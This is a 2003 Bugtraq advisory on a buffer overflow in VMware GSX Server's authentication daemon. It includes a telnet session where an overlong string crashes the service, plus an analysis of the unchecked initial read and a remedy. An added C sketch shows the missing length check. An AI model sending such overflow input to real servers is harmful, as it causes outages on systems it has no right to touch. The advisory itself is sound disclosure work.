
List:       bugtraq
Subject:    VMWare GSX Server Authentication Server Buffer Overflow
From:       Darryl Swofford <dswofford () kpmg ! com>
Date:       2003-10-31 16:28:55



Author: Darryl Swofford
Email: dswofford@kpmg.com

Date: 2003/10/31

System:
VMware GSX Server 2.0.1 build-2129 for Windows (other versions not tested). Tested on Windows NT/2000/2003/XP systems.

Description:
After reviewing Bugtraq #5294 (VMWare GSX Server Authentication Server Buffer Overflow Vulnerability) I was able to modify the sample code to exploit the updated vmware-authd service.

I will not release the source code as I feel this is not prudent until the vendor acknowledges the issue. Until then you can view the overflow by using telnet with the following syntax and simply alter the code as I did.

> telnet VMserver.somecompany.com 902
> 220 VMware Authentication Daemon Version 1.00
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA599 \
vmware-authd  PANIC: Buffer overflow in VMAuthdSocketRead()
 >
Connection to host lost.


Analysis:
It seems that the vmware-authd service limits the input strings of the program when passed correct arguments (USER, PASS, GLOBAL); however, the initial readline can be overflowed as it does not control the amount of data passed to it.

Remedy:
Stop and disable the VMware authorization service. 
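
The length check that the Analysis describes as missing from the initial read, sketched as an added example (not VMware's code and not part of the original post). `read_line_bounded`, `struct stream`, `check_input` and the 16-byte buffer are hypothetical names and values chosen for illustration; the stream is a constructed in-memory stand-in for the socket.

```c
#include <stddef.h>
#include <string.h>

/* Constructed stand-in for a socket: bytes already received from the peer. */
struct stream { const char *data; size_t len, pos; };

#define LINE_OK        0
#define LINE_TOO_LONG -1   /* caller should report an error and drop the peer */
#define LINE_EOF      -2   /* peer closed before sending a complete line */

/* Read one LF- or CRLF-terminated line into out[0..cap-1], always
 * NUL-terminated. The bound is checked on every byte and before any command
 * parsing, so the first line of a session is covered, not only the
 * arguments of recognised commands. */
int read_line_bounded(struct stream *s, char *out, size_t cap)
{
    size_t n = 0;
    if (cap == 0) return LINE_TOO_LONG;
    while (s->pos < s->len) {
        char c = s->data[s->pos++];
        if (c == '\n') {
            if (n > 0 && out[n - 1] == '\r') n--;   /* strip CR of CRLF */
            out[n] = '\0';
            return LINE_OK;
        }
        if (n + 1 >= cap) {          /* no room for c plus the NUL */
            out[0] = '\0';
            return LINE_TOO_LONG;    /* reject; do not truncate and go on */
        }
        out[n++] = c;
    }
    out[0] = '\0';
    return LINE_EOF;
}

/* Hypothetical line buffer, kept small so the limit is easy to exercise. */
static char line_buf[16];

/* Run one constructed input through the reader and return its status. */
int check_input(const char *bytes)
{
    struct stream s = { bytes, strlen(bytes), 0 };
    return read_line_bounded(&s, line_buf, sizeof line_buf);
}
```
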

